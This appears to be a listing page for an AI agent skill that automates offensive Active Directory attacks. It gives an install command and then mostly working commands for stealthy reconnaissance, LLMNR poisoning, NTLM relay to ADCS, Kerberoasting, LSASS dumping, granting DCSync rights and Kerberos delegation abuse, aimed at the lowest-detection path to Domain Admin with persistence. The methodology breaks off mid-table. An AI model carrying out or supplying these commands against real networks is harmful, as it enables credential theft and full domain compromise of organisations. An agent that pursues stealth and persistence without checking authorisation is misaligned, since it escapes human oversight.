Offensive Active Directory
🤖 AI Summary
This AI agent automates offensive Active Directory security assessments by performing reconnaissance (BloodHound, ADExplorer), harvesting credentials (Kerberoasting, ASREProast, LSASS), mapping attack paths to Domain Admin/Tier 0, and executing the lowest-detection path with persistence and timestamped documentation.
How to Install
Claude Code:
git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git && cp Claude-Red/Skills/active-directory/offensive-active-directory ~/.claude/skills/SKILL.md -rActive Directory — Offensive Testing Methodology
Quick Workflow
- Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
- Harvest creds via poisoning, Kerberoasting, ASREProast, or LSASS where allowed
- Map attack paths to Domain Admin / Enterprise Admin / Tier 0
- Execute path with lowest detection cost, validate at each hop
- Establish persistence and document every action with timestamps
Reconnaissance
BloodHound Collection
# SharpHound (CSharp collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip
# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth
# Bloodhound.py from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All
PowerView (No Tool Drop)
# Domain enumeration without binaries
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}
ADExplorer Offline
# Take snapshot from any low-priv user, analyze offline
ADExplorer.exe → File → Create Snapshot
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/
Credential Harvesting
LLMNR / NBT-NS / mDNS Poisoning
# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf
# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y
Crack with hashcat mode 5600. If cracking fails, relay instead.
NTLM Relay
# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt
# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
--escalate-user attacker --delegate-access
# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
--adcs --template DomainController
Kerberoasting
# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule
ASREProasting
# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt
LSASS / SAM Dumping
:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full
:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)
:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid
Parse with Mimikatz or pypykatz offline:
pypykatz lsa minidump lsass.dmp
Privilege Escalation Within AD
ACL Abuse
| Right | Abuse |
|---|---|
GenericAll / GenericWrite |
Add SPN → Kerberoast; reset password; add member |
WriteDacl |
Grant yourself DCSync rights, then DCSync |
WriteOwner |
Take ownership → grant rights → exploit |
AllExtendedRights (User) |
Force password change |
AllExtendedRights (Domain) |
DCSync |
AddMember |
Add self to privileged group |
WriteSPN |
Set SPN, kerberoast target |
# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname
# Grant DCSync via WriteDacl
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' \
-PrincipalIdentity attacker -Rights DCSync
Kerberos Delegation
# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap
# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator \
/msdsspn:cifs/dc.corp.local /ptt
# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object
Coercion Primitives
| Technique | Tool / RPC |
|---|---|
| PetitPotam | MS-EFSRPC (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv) |
| Pri |
Details
| Category | AI/ML → ml |
| Source | SnailSploit/Claude-Red |
| SKILL.md | View on GitHub → |
| Repo Stars | ★ 2.4K |
| Est. per Skill | N/A (shared across 50 skills from this repo) |
| Difficulty | Intermediate |
| Risk Level | N/A |
Related Skills
agentphone
AgentPhone AgentPhone is an API-first telephony platform for AI agents. Give your agents phone numbe
git-advanced-workflows
Git Advanced Workflows Master advanced Git techniques to maintain clean history, collaborate effecti
setup-matt-pocock-skills
Setup Matt Pocock's Skills When to Use Use when this workflow matches the user request: Configure th
agentphone
AgentPhone AgentPhone is an API-first telephony platform for AI agents. Give your agents phone numbe
Works Well With
Skills from the same repository — often designed to work together
Offensive Ai Security
SKILL: AI Pentest Metadata Skill Name: ai-security Folder: offensive-ai-security Source: https://git
Offensive Jwt
Overview Comprehensive JWT attack checklist for offensive security engagements. Follow steps in orde
Offensive Oauth
SKILL: OAuth Security Testing Metadata Skill Name: oauth-attacks Folder: offensive-oauth Source: htt